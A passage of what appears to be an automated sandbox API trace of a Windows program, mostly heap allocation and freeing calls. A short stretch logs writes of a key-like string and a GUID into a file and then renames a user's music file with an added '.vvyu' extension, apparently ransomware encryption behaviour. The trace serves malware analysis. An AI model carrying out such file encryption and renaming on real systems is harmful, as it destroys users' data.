hHeap=0x6a0000) returned 1 [0190.014] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39528 | out: hHeap=0x6a0000) returned 1 [0190.014] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0190.014] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0190.015] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.015] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0190.015] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0190.015] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0190.015] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0190.015] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0190.016] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0190.016] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0190.016] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0190.016] WriteFile (in: hFile=0x584, lpBuffer=0x2d45778*, nNumberOfBytesToWrite=0x6a6a, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d45778*, lpNumberOfBytesWritten=0x30ffb14*=0x6a6a, lpOverlapped=0x0) returned 1 [0190.017] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d45778 | out: hHeap=0x6a0000) returned 1 [0190.017] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x6a6f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.017] WriteFile (in: hFile=0x584, lpBuffer=0x6d5c88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x6d5c88*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0190.018] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0190.018] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fd28 [0190.018] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0190.018] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0190.018] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0190.019] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0190.019] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fd28 | out: hHeap=0x6a0000) returned 1 [0190.019] WriteFile (in: hFile=0x584, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0190.019] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0190.020] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0190.020] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0190.020] CloseHandle (hObject=0x584) returned 1 [0190.021] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea898 [0190.021] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x890) returned 0x2d45778 [0190.022] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea898 | out: hHeap=0x6a0000) returned 1 [0190.022] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\wd-bCBiK6pAQlyST.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\fuhvly4jeagwk\\wd-bcbik6paqlyst.m4a"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\wd-bCBiK6pAQlyST.m4a.vvyu" (normalized: "c:\\users\\keecfmwgj\\music\\fuhvly4jeagwk\\wd-bcbik6paqlyst.m4a.vvyu")) returned 1 [0190.023] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d45778 | out: hHeap=0x6a0000) returned 1 [0190.023] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0190.023] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.026] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0190.026] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x569341e0, ftCreationTime.dwHighDateTime=0x1d8a62d, ftLastAccessTime.dwLowDateTime=0xc8d57cb0, ftLastAccessTime.dwHighDateTime=0x1d8a66d, ftLastWriteTime.dwLowDateTime=0xc8d57cb0, ftLastWriteTime.dwHighDateTime=0x1d8a66d, nFileSizeHigh=0x0, nFileSizeLow=0x6a6f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wd-bCBiK6pAQlyST.m4a", cAlternateFileName="WD-BCB~1.M4A")) returned 0 [0190.027] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0190.027] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0190.027] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b10 | out: hHeap=0x6a0000) returned 1 [0190.028] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0190.028] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b10 [0190.028] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0190.028] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.028] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.028] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.028] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.029] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.029] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.029] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.029] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.029] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.030] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.030] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.030] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.030] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.030] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.030] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.030] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.031] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.031] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.031] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.031] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0190.032] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.032] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.032] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.032] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.032] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d3a670 [0190.033] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.033] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0190.033] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.033] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.034] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.034] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.034] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.034] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.034] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0190.035] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.035] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.035] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.035] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0190.036] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0190.036] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.036] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.036] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0190.036] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0190.037] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.037] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.037] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.037] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.038] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.038] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.038] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.038] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.039] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.039] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.039] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0190.039] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.039] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.039] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.039] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0190.040] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.040] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.040] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.040] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.040] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.041] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.041] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.041] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.041] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.041] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.041] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.041] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.042] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.042] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.042] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.042] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.042] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.043] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.043] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.043] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.043] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.044] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.044] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.044] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.044] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.045] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.045] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.045] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.045] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.045] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.045] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.045] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.045] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0190.046] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.046] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0190.046] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.046] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.046] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.047] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.047] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.047] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.047] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.047] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d3a670 [0190.048] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.048] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0190.048] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.049] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.049] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0190.049] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0190.049] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.049] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.049] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0190.049] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0190.050] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.050] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.050] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.050] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.050] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.050] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.050] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.051] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.051] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.051] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.051] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.051] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0190.051] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.052] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0190.052] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.052] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.052] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0190.052] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.053] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.053] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.053] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0190.053] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.053] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.053] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.053] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.054] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.054] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.054] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.054] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.054] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.055] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.055] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.055] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.055] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.055] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.055] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.055] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.056] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.056] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.056] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.056] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.056] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.057] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.057] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.057] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.057] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.057] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.057] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.057] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.058] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.058] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.058] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.058] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0190.058] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0190.059] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.059] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0190.060] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.060] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.060] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0190.060] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.060] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c829b0 | out: hHeap=0x6a0000) returned 1 [0190.060] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c829b0 [0190.061] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0190.061] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, 